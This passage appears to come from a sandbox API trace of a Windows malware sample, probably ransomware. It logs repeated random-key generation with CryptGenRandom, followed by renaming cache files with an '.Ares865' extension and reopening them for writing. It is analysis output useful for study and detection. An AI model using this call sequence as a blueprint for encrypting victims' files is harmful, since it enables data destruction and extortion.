(HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.842] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.842] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.842] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.849] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865") returned 156 [0109.851] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.ares865"), dwFlags=0x1) returned 1 [0109.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.853] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=430) returned 1 [0109.853] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.853] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.853] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.853] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.854] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.854] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.856] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.857] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.858] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865") returned 156 [0109.858] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.ares865"), dwFlags=0x1) returned 1 [0109.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.859] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0109.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.860] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.860] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.861] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.864] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.865] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.865] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.865] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865") returned 156 [0109.865] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.ares865"), dwFlags=0x1) returned 1 [0109.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.867] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0109.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.867] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.868] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.868] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.872] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.874] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.874] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865") returned 156 [0109.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.ares865"), dwFlags=0x1) returned 1 [0109.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=400) returned 1 [0109.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.877] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.881] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.882] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.882] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865") returned 156 [0109.883] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.ares865"), dwFlags=0x1) returned 1 [0109.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.884] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=398) returned 1 [0109.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.885] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.885] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.885] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.888] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.889] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.Ares865") returned 123 [0109.889] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.ares865"), dwFlags=0x1) returned 1 [0109.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=244) returned 1 [0109.891] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.891] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.891] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.891] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865") returned 156 [0109.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.ares865"), dwFlags=0x1) returned 1 [0109.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.897] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=398) returned 1 [0109.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.897] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.898] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.898] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.900] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.901] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.901] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.901] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865") returned 123 [0109.901] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.ares865"), dwFlags=0x1) returned 1 [0109.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.903] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=256) returned 1 [0109.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.904] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.904] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.905] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.910] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.910] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865") returned 156 [0109.910] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.ares865"), dwFlags=0x1) returned 1 [0109.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.912] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=434) returned 1 [0109.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.913] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: 